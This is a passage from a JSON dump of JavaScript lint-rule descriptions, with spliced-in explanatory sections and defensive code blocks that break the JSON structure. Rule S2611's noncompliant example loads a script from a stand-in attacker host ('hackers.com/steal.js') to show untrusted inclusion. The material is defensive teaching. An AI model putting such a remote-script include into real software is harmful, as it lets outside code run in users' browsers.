a+b;\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2424","repo":"javascript","name":"Built-in objects should not be overridden","htmlDesc":"<p>Overriding an object changes its behavior and could potentially 
impact all code using that object. Overriding standard, built-in objects could\ntherefore have broad, potentially catastrophic effects on previously-working code.<\/p>\n<p>This rule detects overrides of the following native objects:<\/p>\n<ul>\n  <li> Fundamental objects - Object, Function, Boolean, Symbol, Error, EvalError, InternalError, RangeError, ReferenceError, SyntaxError, TypeError,\n  URIError <\/li>\n  <li> Numbers and dates - Number, Math, Date <\/li>\n  <li> Text processing - String, RegExp <\/li>\n  <li> Indexed collections - Array, Int8Array, Uint8Array, Uint8ClampedArray, Int16Array, Uint16Array, Int32Array, Uint32Array, Float32Array,\n  Float64Array <\/li>\n  <li> Keyed collections - Map, Set, WeakMap, WeakSet <\/li>\n  <li> Structured data - ArrayBuffer, DataView, JSON <\/li>\n  <li> Control abstraction objects - Promise <\/li>\n  <li> Reflection - Reflect, Proxy <\/li>\n  <li> Internationalization - Intl <\/li>\n  <li> Non-standard objects - Generator, Iterator, ParallelArray, StopIteration <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2427","repo":"javascript","name":"The base should be provided to \"parseInt\"","htmlDesc":"<p>The <code>parseInt<\/code> function has two versions, one that takes a base value as a second argument, and one that does not. Unfortunately the\nsingle-argument version guesses the base from the string: a leading \"0x\" is read as hexadecimal, and pre-ES5 engines read a leading \"0\" as octal. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nparseInt(\"010\");  \/\/ Noncompliant; pre-2013 browsers may return 8, current engines return 10\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nparseInt(\"010\", 10);\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2432","repo":"javascript","name":"Setters should not return values","htmlDesc":"<p>An assignment that triggers a function declared with the <code>set<\/code> keyword always evaluates to the assigned value. 
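The S2424 description above lists the native objects whose replacement the rule flags statically. The following is an added example, not code from the rule dump or from the sonar-rules project, showing the runtime counterpart: an audit that walks those globals and reports any function that is no longer native code (what a malicious dependency overriding `JSON.parse` or `Array.prototype.map` would leave behind), plus a freeze-based hardening step. It assumes `Function.prototype.toString` is captured before any tampering; the `tamperedRoot` object is constructed for the demo, and the list of audited globals is the subset of the rule's list that exists in every current engine.

```javascript
// Added example, not part of the rule dump or the sonar-rules project.
// Audit the native objects S2424 names for replaced functions, reading only
// property descriptors so that no built-in getter is ever invoked.
// Assumption: Function.prototype.toString is captured before any tampering.
const nativeToString = Function.prototype.toString;

// The objects S2424 lists that exist in every current engine (Intl and the
// non-standard ones are left out so the audit runs everywhere).
const AUDITED_GLOBALS = [
  "Object", "Function", "Boolean", "Symbol", "Error", "RangeError",
  "ReferenceError", "SyntaxError", "TypeError", "URIError", "Number", "Math",
  "Date", "String", "RegExp", "Array", "Int8Array", "Uint8Array", "Map", "Set",
  "WeakMap", "WeakSet", "ArrayBuffer", "DataView", "JSON", "Promise",
  "Reflect", "Proxy",
];

// A genuine built-in stringifies to "function name() { [native code] }";
// code written in JavaScript shows its source instead. Bound functions also
// print "[native code]", so they are treated as suspicious rather than native.
function isNativeFunction(fn) {
  return typeof fn === "function" &&
    !/^bound /.test(fn.name) &&
    /\{\s*\[native code\]\s*\}\s*$/.test(nativeToString.call(fn));
}

// Check every own property of obj (data values, getters and setters) through
// its descriptor, never through property access, and record non-native functions.
function auditOwnFunctions(obj, path, findings) {
  for (const key of Object.getOwnPropertyNames(obj)) {
    const d = Object.getOwnPropertyDescriptor(obj, key);
    for (const slot of ["value", "get", "set"]) {
      const fn = d[slot];
      if (typeof fn === "function" && !isNativeFunction(fn)) {
        const suffix = slot === "value" ? "" : ` (${slot})`;
        findings.push({ path: `${path}.${key}${suffix}`, problem: "not native code" });
      }
    }
  }
}

// Walk the named globals of root (the real global object by default) and
// return [{path, problem}]; an empty list means nothing has been replaced.
function auditNatives(root = globalThis, names = AUDITED_GLOBALS) {
  const findings = [];
  for (const name of names) {
    const value = root[name];
    if (value === undefined || value === null) {
      findings.push({ path: name, problem: "missing" });
      continue;
    }
    if (typeof value === "function" && !isNativeFunction(value)) {
      findings.push({ path: name, problem: "constructor replaced" });
    }
    auditOwnFunctions(value, name, findings);
    const proto = typeof value === "function" ? value.prototype : undefined;
    if (proto !== undefined && proto !== null) {
      auditOwnFunctions(proto, `${name}.prototype`, findings);
    }
  }
  return findings;
}

// Hardening: freeze the objects and their prototypes so later code cannot
// replace their methods (Reflect.set returns false, strict-mode assignment
// throws). Freezing the real prototypes breaks polyfills, so only do this in
// an application that controls all of its dependencies.
function freezeNatives(root = globalThis, names = AUDITED_GLOBALS) {
  let frozen = 0;
  for (const name of names) {
    const value = root[name];
    if (value === undefined || value === null) continue;
    Object.freeze(value);
    frozen += 1;
    if (typeof value === "function" && value.prototype != null) {
      Object.freeze(value.prototype);
      frozen += 1;
    }
  }
  return frozen;
}

// Constructed stand-in for a page whose JSON.parse was swapped by a dependency
// (the "Math" entry holds genuine natives so the audit has a clean object too).
function tamperedRoot() {
  return {
    JSON: { parse: (text) => text, stringify: JSON.stringify },
    Math: { floor: Math.floor, random: Math.random },
  };
}

const report = auditNatives();
console.log(report.length === 0 ? "built-ins intact" : report);
console.log(auditNatives(tamperedRoot(), ["JSON", "Math", "Proxy"]));
```

Run the audit early, before third-party code, and again at a checkpoint such as before a sensitive operation; a finding means the environment, not just one call site, can no longer be trusted. The `[native code]` check is a heuristic: it catches plain JavaScript replacements and bound wrappers, but not a replacement installed through a Proxy, and it relies on the captured `Function.prototype.toString` being genuine.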
Thus any value explicitly returned from\na setter will be ignored, and explicitly returning a value is an error.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar person = {\n  \/\/ ...\n  set name(name) {\n    this._name = name;\n    return 42;  \/\/ Noncompliant\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar person = {\n  \/\/ ...\n  set name(name) {\n    this._name = name;  \/\/ stored under another key; assigning this.name here would call the setter again\n  }\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2508","repo":"javascript","name":"The names of model properties should not contain spaces","htmlDesc":"<p>When using the Backbone.js framework, the names of model attributes should not contain spaces. This is because the Events object accepts\nspace-delimited lists of events, so an attribute with spaces in its name could be misinterpreted.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nPerson = Backbone.Model.extend({\n        defaults: {\n            'first name': 'Bob',      \/\/ Noncompliant\n            'birth date': new Date()  \/\/ Noncompliant\n        },\n    });\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nPerson = Backbone.Model.extend({\n        defaults: {\n            firstName: 'Bob',\n            birthDate: new Date()\n        },\n    });\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2583","repo":"javascript","name":"Conditionally executed blocks should be reachable","htmlDesc":"<p>Conditional expressions which are always <code>true<\/code> or <code>false<\/code> can lead to dead code. 
Such code is always buggy and should never\nbe used in production.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\na = false;\nif (a) { \/\/ Noncompliant\n  doSomething(); \/\/ never executed\n}\n\nif (!a || b) { \/\/ Noncompliant; \"!a\" is always \"true\", \"b\" is never evaluated\n  doSomething();\n} else {\n  doSomethingElse(); \/\/ never executed\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 13.7 - Boolean operations whose results are invariant shall not be permitted. <\/li>\n  <li> MISRA C:2012, 14.3 - Controlling expressions shall not be invariant <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/570.html\">MITRE, CWE-570<\/a> - Expression is Always False <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/571\">MITRE, CWE-571<\/a> - Expression is Always True <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n  executed <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2589","repo":"javascript","name":"Boolean expressions should not be gratuitous","htmlDesc":"<p>If a boolean expression doesn't change the evaluation of the condition, then it is entirely unnecessary, and can be removed. 
If it is gratuitous\nbecause it does not match the programmer's intent, then it's a bug and the expression should be fixed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\na = true;\nif (a) { \/\/ Noncompliant\n  doSomething();\n}\n\nif (b &amp;&amp; a) { \/\/ Noncompliant; \"a\" is always \"true\"\n  doSomething();\n}\n\nif (c || !a) { \/\/ Noncompliant; \"!a\" is always \"false\"\n  doSomething();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\na = true;\nif (foo(a)) {\n  doSomething();\n}\n\nif (b) {\n  doSomething();\n}\n\nif (c) {\n  doSomething();\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 13.7 - Boolean operations whose results are invariant shall not be permitted. <\/li>\n  <li> MISRA C:2012, 14.3 - Controlling expressions shall not be invariant <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/489\">MITRE, CWE-489<\/a> - Leftover Debug Code <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/571\">MITRE, CWE-571<\/a> - Expression is Always True <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n  executed <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2611","repo":"javascript","name":"Untrusted content should not be included","htmlDesc":"<p>Including content in your site from an untrusted source can expose your users to attackers and even compromise your own site. 
For that reason, this\nrule raises an issue for each non-relative URL.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction include(url) {\n  var s = document.createElement(\"script\");\n  s.setAttribute(\"type\", \"text\/javascript\");\n  s.setAttribute(\"src\", url);\n  document.body.appendChild(s);\n}\ninclude(\"http:\/\/hackers.com\/steal.js\")  \/\/ Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/829\">MITRE, CWE-829<\/a> - Inclusion of Functionality from Untrusted Control Sphere <\/li>\n  <li> <a href=\"http:\/\/www.sans.org\/top25-software-errors\/\">SANS Top 25<\/a> - Risky Resource Management <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[{"key":"domainsToIgnore","htmlDesc":"Comma-delimited list of domains to ignore. Regexes may be used, e.g. (.*\\.)?example.com,foo.org","type":"STRING"}],"type":"VULNERABILITY"},{"key":"javascript:S2688","repo":"javascript","name":"\"NaN\" should not be used in comparisons","htmlDesc":"<p><code>NaN<\/code> is not equal to anything, even itself. Testing for equality or inequality against <code>NaN<\/code> will yield predictable results,\nbut probably not the ones you want. <\/p>\n<p>Instead, the best way to see whether a variable is equal to <code>NaN<\/code> is to use <code>Number.isNaN()<\/code>, since ES2015, or (perhaps\ncounter-intuitively) to compare it to itself. 
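S2611 above flags every non-relative script URL and offers a `domainsToIgnore` allowlist of regex patterns. What follows is an added example, not code from the rule dump or from the sonar-rules project, of the policy a page should enforce before it creates a script element: relative URLs stay first-party and pass; anything else must be `https:`, on an allowlisted host, and pinned with a Subresource Integrity hash. The host patterns use the same notation as the rule's parameter but are anchored to the whole hostname, and the block shows what the unanchored form would accept. The page origin `https://app.example.org`, the allowlist, and the `scriptAttributesFor` helper are assumptions made for the demo.

```javascript
// Added example, not part of the rule dump or the sonar-rules project.
// Decide whether a script URL may be loaded, in the spirit of S2611: relative
// URLs resolve to the page's own origin and pass; anything else must be https,
// on an allowlisted host, and carry a Subresource Integrity hash. Host
// patterns use the notation of the rule's domainsToIgnore parameter
// (e.g. "(.*\\.)?example.com") but are anchored to the whole hostname.
// The page origin and allowlist below are assumptions made for the demo.
const PAGE_ORIGIN = "https://app.example.org";
const DEMO_HOST_PATTERNS = ["(.*\\.)?example.com"];

// Anchor each pattern so "example.com" cannot match "example.com.attacker.net".
// Note that an unescaped dot in a pattern still matches any character.
function compileHostPatterns(patterns) {
  return patterns.map((p) => new RegExp(`^(?:${p})$`, "i"));
}

// What an unanchored test of the same pattern would accept (for contrast).
function unanchoredHostMatch(pattern, hostname) {
  return new RegExp(pattern, "i").test(hostname);
}

function evaluateScriptSource(url, options = {}) {
  const { pageOrigin = PAGE_ORIGIN, hostPatterns = [], integrity = null } = options;
  let parsed;
  try {
    parsed = new URL(url, pageOrigin);
  } catch {
    return { allowed: false, reason: "unparseable URL" };
  }
  // A relative URL (or an absolute one on our own origin) stays first-party.
  if (parsed.origin === new URL(pageOrigin).origin) {
    return { allowed: true, reason: "same-origin", src: parsed.href };
  }
  // Rejects http:, data:, javascript:, blob: and protocol-relative http URLs.
  if (parsed.protocol !== "https:") {
    return { allowed: false, reason: `scheme ${parsed.protocol} not allowed for third-party scripts` };
  }
  const hostAllowed = compileHostPatterns(hostPatterns).some((re) => re.test(parsed.hostname));
  if (!hostAllowed) {
    return { allowed: false, reason: `host ${parsed.hostname} is not on the allowlist` };
  }
  // Even an allowlisted CDN can be compromised; pin the bytes with SRI.
  if (!/^sha(256|384|512)-[A-Za-z0-9+/]+=*$/.test(integrity || "")) {
    return { allowed: false, reason: "third-party script requires a Subresource Integrity hash" };
  }
  return {
    allowed: true,
    reason: "allowlisted host with SRI",
    src: parsed.href,
    integrity,
    crossorigin: "anonymous",
  };
}

// The DOM-facing half: produce the <script> attributes only when the policy
// allows the source, so a caller cannot skip the check by accident. In a
// browser: Object.assign(document.createElement("script"), attrs).
function scriptAttributesFor(url, options = {}) {
  const verdict = evaluateScriptSource(url, options);
  if (!verdict.allowed) {
    throw new Error(`refusing to include ${url}: ${verdict.reason}`);
  }
  const attrs = { type: "text/javascript", src: verdict.src };
  if (verdict.integrity) {
    attrs.integrity = verdict.integrity;
    attrs.crossorigin = verdict.crossorigin;
  }
  return attrs;
}

console.log(evaluateScriptSource("http://hackers.com/steal.js", { hostPatterns: DEMO_HOST_PATTERNS }));
console.log(scriptAttributesFor("/static/app.js"));
```

The allowlist is only as good as its anchoring: the rule's example pattern `(.*\.)?example.com`, tested without `^` and `$`, also accepts `example.com.attacker.net`. A Content Security Policy `script-src` directive enforces the same host restriction in the browser itself and is the stronger control; this function is the application-level check that keeps the two in agreement.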
Since <code>NaN !== NaN<\/code>, when <code>a !== a<\/code>, you know it must equal <code>NaN<\/code>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar a = NaN;\n\nif (a === NaN) {  \/\/ Noncompliant; always false\n  console.log(\"a is not a number\");  \/\/ this is dead code\n}\nif (a !== NaN) { \/\/ Noncompliant; always true\n  console.log(\"a is not NaN\"); \/\/ this statement is not necessarily true\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (Number.isNaN(a)) {\n  console.log(\"a is not a number\");\n}\nif (!Number.isNaN(a)) {\n  console.log(\"a is not NaN\");\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/7AEqAQ\">CERT, NUM07-J.<\/a> - Do not attempt comparisons with NaN <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2692","repo":"javascript","name":"\"indexOf\" checks should not be for positive numbers","htmlDesc":"<p>Most checks against an <code>indexOf<\/code> call against a string or array compare it with -1 because 0 is a valid index. 
Any checks which look for\nvalues &gt;0 ignore the first element, which is likely a bug.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar color = \"blue\";\nvar name = \"ishmael\";\nvar number = 123;\n\nvar arr = [color, name];\n\nif (arr.indexOf(\"blue\") &gt; 0) { \/\/ Noncompliant\n  \/\/ ...\n}\nif (arr[0].indexOf(\"ish\") &gt; 0) { \/\/ Noncompliant\n  \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar color = \"blue\";\nvar name = \"ishmael\";\nvar number = 123;\n\nvar arr = [color, name];\n\nif (arr.indexOf(\"blue\") &gt;= 0) {\n  \/\/ ...\n}\nif (arr[0].indexOf(\"ish\") &gt; -1) {\n  \/\/ ...\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2714","repo":"javascript","name":"Element type selectors should not be used with class selectors","htmlDesc":"<p>Using element type in class selectors is slower than using only the class selector.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar $products = $(\"div.products\");    \/\/ Noncompliant - slow\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar $products = $(\".products\");    \/\/ Compliant - fast\n<\/pre>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2715","repo":"javascript","name":"\"find\" should be used to select the children of an element known by id","htmlDesc":"<p>The use of <code>find<\/code> allows <code>document.getElementById()<\/code> to be used for the top-level selection, and saves the jQuery Sizzle\nengine for where it's really needed. 
That makes the query faster, and your application more responsive.<\/p>\n<p>From the jQuery documentation:<\/p>\n<blockquote>\n  <p>Beginning your selector with an ID is always best.<\/p>\n  <p>The <code>.find()<\/code> approach is faster because the first selection is handled without going through the Sizzle selector engine \u2013 ID-only\n  selections are handled using <code>document.getElementById()<\/code>, which is extremely fast because it is native to the browser.<\/p>\n<\/blockquote>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar $productIds = $(\"#products div.id\"); \/\/ Noncompliant - a nested query for Sizzle selector engine\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar $productIds = $(\"#products\").find(\"div.id\"); \/\/ Compliant - #products is already selected by document.getElementById() so only div.id needs to go through Sizzle selector engine\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2757","repo":"javascript","name":"\"=+\" should not be used instead of \"+=\"","htmlDesc":"<p>The use of operators pairs (<code>=+<\/code> or <code>=-<\/code>) where the reversed, single operator was meant (<code>+=<\/code> or <code>-=<\/code>)\nwill compile and run, but not produce the expected results.<\/p>\n<p>This rule raises an issue when <code>=+<\/code> and <code>=-<\/code> are used without any space between the two operators and when there is at least\none whitespace after.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar target =-5;\nvar num = 3;\n\ntarget =- num;  \/\/ Noncompliant; target = -3. 
Is that really what's meant?\ntarget =+ num; \/\/ Noncompliant; target = 3\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar target = -5;\nvar num = 3;\n\ntarget = -num;  \/\/ Compliant; intent to assign inverse value of num is clear\ntarget += num;\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2770","repo":"javascript","name":"Deprecated jQuery methods should not be used","htmlDesc":"<p>Deprecation is a warning that a method has been superseded, and will eventually be removed. The deprecation period allows you to make a smooth\ntransition away from the aging, soon-to-be-retired technology.<\/p>\n<p>This rule raises an issue when any of the following methods is used:<\/p>\n<ul>\n  <li> <code>.andSelf()<\/code> <\/li>\n  <li> <code>.context<\/code> <\/li>\n  <li> <code>.die()<\/code> <\/li>\n  <li> <code>.error()<\/code> <\/li>\n  <li> <code>jQuery.boxModel<\/code> <\/li>\n  <li> <code>jQuery.browser<\/code> <\/li>\n  <li> <code>jQuery.sub()<\/code> <\/li>\n  <li> <code>jQuery.support<\/code> <\/li>\n  <li> <code>.live()<\/code> <\/li>\n  <li> <code>.load()<\/code> <\/li>\n  <li> <code>.selector<\/code> <\/li>\n  <li> <code>.size()<\/code> <\/li>\n  <li> <code>.toggle()<\/code> <\/li>\n  <li> <code>.unload()<\/code> <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2817","repo":"javascript","name":"Web SQL databases should not be used","htmlDesc":"<p>The Web SQL Database standard never saw the light of day. It was first formulated, then deprecated by the W3C and was only implemented in some\nbrowsers. 
(It is not supported in Firefox or IE.)<\/p>\n<p>Further, the use of a Web SQL Database poses security concerns, since you only need its name to access such a database.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar db = window.openDatabase(\"myDb\", \"1.0\", \"Personal secrets stored here\", 2*1024*1024);  \/\/ Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A6-Sensitive_Data_Exposure\">OWASP Top Ten 2013 Category A6<\/a> - Sensitive Data Exposure\n  <\/li>\n  <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities\">OWASP Top Ten 2013 Category A9<\/a> - Using\n  Components with Known Vulnerabilities <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"VULNERABILITY"},{"key":"javascript:S2819","repo":"javascript","name":"Cross-document messaging domains should be carefully restricted","htmlDesc":"<p>HTML5 adds the ability to send messages to documents served from other domains. 
According to the specification:<\/p>\n<blockquote>\n  Authors should not use the wildcard keyword (\n  <code>*<\/code>) in the\n  <code>targetOrigin<\/code> argument in messages that contain any confidential information, as otherwise there is no way to guarantee that the message\n  is only delivered to the recipient to which it was intended.\n<\/blockquote>\n<p>To mitigate the risk of sending sensitive information to a document served from a hostile or unknown domain, this rule raises an issue each time\n<code>Window.postMessage<\/code> is used.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar myWindow = document.getElementById('myIFrame').contentWindow;\nmyWindow.postMessage(message, \"*\"); \/\/ Noncompliant; how do you know what you loaded in 'myIFrame' is still there?\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A3-Cross-Site_Scripting_(XSS)\">OWASP Top Ten 2013 Category A3<\/a> - Cross-Site Scripting\n  (XSS) <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"VULNERABILITY"},{"key":"javascript:S2870","repo":"javascript","name":"\"delete\" should not be used on arrays","htmlDesc":"<p>The <code>delete<\/code> operator can be used to remove a property from any object. Arrays are objects, so the <code>delete<\/code> operator can be\nused here too, but if it is, a hole will be left in the array because the indexes\/keys won't be shifted to reflect the deletion. 
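S2819 above quotes the specification's warning about `targetOrigin = "*"` and raises an issue on every `postMessage` call; the receiving side, which the rule does not cover, needs the mirror-image check on `event.origin`. The following is an added example, not code from the rule dump or from the sonar-rules project, of a small channel wrapper that makes both checks unavoidable. The window objects and message events are minimal stand-ins constructed for the demo so that it runs outside a browser, and the origins are assumptions.

```javascript
// Added example, not part of the rule dump or the sonar-rules project.
// A wrapper around Window.postMessage that makes the origin checks S2819 asks
// for unavoidable on both ends. The window objects and message events used
// here are minimal stand-ins (constructed for the demo) so that the code runs
// outside a browser; the origins are assumptions as well.

// Accept only a bare origin: scheme and host (and port), nothing after it.
// Returns the normalised origin, or null for "*", paths and opaque origins.
function normalizeOrigin(origin) {
  let u;
  try {
    u = new URL(origin);
  } catch {
    return null;
  }
  if (u.origin === "null" || u.href !== u.origin + "/") return null;
  return u.origin;
}

function createMessageChannel({ allowedOrigins, expectedSource = null, onMessage }) {
  const allowed = new Set();
  for (const o of allowedOrigins) {
    const n = normalizeOrigin(o);
    if (n === null) throw new TypeError(`not a usable origin: ${o}`);
    allowed.add(n);
  }
  if (allowed.size === 0) throw new TypeError("allowlist must not be empty");

  return {
    // Sender: refuse "*" and anything not on the list; pass the exact origin
    // so the browser drops the message if the frame has navigated elsewhere.
    send(targetWindow, message, targetOrigin) {
      const n = normalizeOrigin(targetOrigin);
      if (n === null || !allowed.has(n)) {
        throw new Error(`refusing to post to ${String(targetOrigin)}`);
      }
      targetWindow.postMessage(message, n);
      return n;
    },
    // Receiver: check event.origin (and the source window when known) before
    // looking at event.data. "null" covers sandboxed iframes and file: pages.
    receive(event) {
      if (!allowed.has(event.origin)) {
        return { accepted: false, reason: "origin not allowed" };
      }
      if (expectedSource !== null && event.source !== expectedSource) {
        return { accepted: false, reason: "unexpected source window" };
      }
      const data = event.data;
      if (typeof data !== "object" || data === null || typeof data.type !== "string") {
        return { accepted: false, reason: "malformed message" };
      }
      onMessage(data, event.origin);
      return { accepted: true };
    },
  };
}

// Stand-in for an iframe's contentWindow that records what was posted.
function fakeWindow() {
  const sent = [];
  return {
    sent,
    postMessage(message, targetOrigin) {
      sent.push({ message, targetOrigin });
    },
  };
}

const frame = fakeWindow();
const channel = createMessageChannel({
  allowedOrigins: ["https://widget.example.com"],
  expectedSource: frame,
  onMessage: (data, origin) => console.log("accepted", data.type, "from", origin),
});
channel.send(frame, { type: "config", theme: "dark" }, "https://widget.example.com");
console.log(channel.receive({ origin: "https://evil.example", source: frame, data: { type: "pong" } }));
```

In a page the receiver is wired up with `window.addEventListener("message", (e) => channel.receive(e))`. Two caveats the rule's example hints at: `targetOrigin` protects the sender only at delivery time, so the check on the receiving side is what protects the data once it arrives, and a `"*"` target is acceptable only for messages that carry nothing confidential and that the receiver would be happy to get from any origin.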
<\/p>\n<p>The proper methods for removing elements are:<\/p>\n<ul>\n  <li> <code>Array.prototype.splice<\/code> - add\/remove elements at any index of the array <\/li>\n  <li> <code>Array.prototype.pop<\/code> - remove the last element of the array <\/li>\n  <li> <code>Array.prototype.shift<\/code> - remove the first element of the array <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar myArray = ['a', 'b', 'c', 'd'];\n\ndelete myArray[2];  \/\/ Noncompliant. myArray =&gt; ['a', 'b', , 'd'] (a hole; length is still 4)\nconsole.log(myArray[2]); \/\/ expected value was 'd' but output is undefined\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar myArray = ['a', 'b', 'c', 'd'];\n\n\/\/ removes 1 element from index 2\nvar removed = myArray.splice(2, 1);  \/\/ removed =&gt; ['c'], myArray =&gt; ['a', 'b', 'd']\nconsole.log(myArray[2]); \/\/ outputs 'd'\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2873","repo":"javascript","name":"Calls should not be made to non-callable values","htmlDesc":"<p>The fact that JavaScript is not a strongly typed language allows developers a lot of freedom, but that freedom can be dangerous if you go too far\nwith it. <\/p>\n<p>Specifically, it is syntactically acceptable to invoke any expression as though its value were a function. 
But a <code>TypeError<\/code> may be\nraised if you do.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfoo = 1;\nfoo();   \/\/ Noncompliant; TypeError\n\nfoo = undefined;\nfoo();  \/\/ Noncompliant; TypeError\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2898","repo":"javascript","name":"\"[type=...]\" should be used to select elements by type","htmlDesc":"<p>While <code>:&lt;element_type&gt;<\/code> and <code>[type=\"&lt;element_type&gt;\"]<\/code> can both be used in jQuery to select elements by their\ntype, <code>[type=\"&lt;element_type&gt;\"]<\/code> is far faster because it can take advantage of the native DOM <code>querySelectorAll()<\/code> method\nin modern browsers. <\/p>\n<p>This rule raises an issue when following selectors are used:<\/p>\n<ul>\n  <li> <code>:checkbox<\/code> <\/li>\n  <li> <code>:file<\/code> <\/li>\n  <li> <code>:image<\/code> <\/li>\n  <li> <code>:password<\/code> <\/li>\n  <li> <code>:radio<\/code> <\/li>\n  <li> <code>:reset<\/code> <\/li>\n  <li> <code>:text<\/code> <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar input = $( \"form input:radio\" ); \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar input = $( \"form input[type=radio]\" ); \/\/ Compliant\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2990","repo":"javascript","name":"The global \"this\" object should not be used","htmlDesc":"<p>When the keyword <code>this<\/code> is used outside of an object, it refers to the global <code>this<\/code> object, which is the same thing as the\n<code>window<\/code> object in a standard web page. This could be confusing to maintainers. 
